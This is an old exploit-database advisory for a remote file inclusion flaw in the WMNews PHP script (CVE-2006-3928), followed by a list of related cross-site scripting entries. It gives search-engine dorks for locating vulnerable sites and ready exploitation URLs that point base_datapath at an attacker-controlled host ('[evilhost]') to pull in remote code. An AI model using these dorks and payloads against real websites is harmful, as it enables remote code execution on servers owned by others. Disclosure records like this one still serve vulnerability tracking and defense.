Advisory: WMNews Remote File Include Vulnerability Release Date: 2006/07/26 Author: uNfz Critical Level: High Contact: unfzbr@hotmail.com Vendor: Warta Mikael -------------------- -------------------- Searching / Dork: allinurl: *.php?Artid=* allinurl: *.php?ArtCat=* allinurl: wmprint.php allinurl: wmview.php -------------------- exploration: /index.php?config=1&base_datapath=http://[evilhost] /[dir]/index.php?config=1&base_datapath=http://[evilhost] -------------------- uNfz irc.efnet.org # milw0rm.com [2006-07-27]
Related Exploits
Trying to match CVEs (1): CVE-2006-3928Trying to match OSVDBs (1): 27547
Other Possible E-DB Search Terms: WMNews 0.2a, WMNews
Date | D | V | Title | Author |
---|---|---|---|---|
2010-01-04 |
![]() |
WMNews - '/admin/wmnews.php' Cross-Site Scripting | indoushka | |
2006-03-10 |
![]() |
WMNews - 'footer.php?ctrrowcol' Cross-Site Scripting | R00T3RR0R | |
2006-03-10 |
![]() |
WMNews - 'wmcomments.php?ArtID' Cross-Site Scripting | R00T3RR0R | |
2006-03-10 |
![]() |
WMNews - 'wmview.php?ArtCat' Cross-Site Scripting | R00T3RR0R |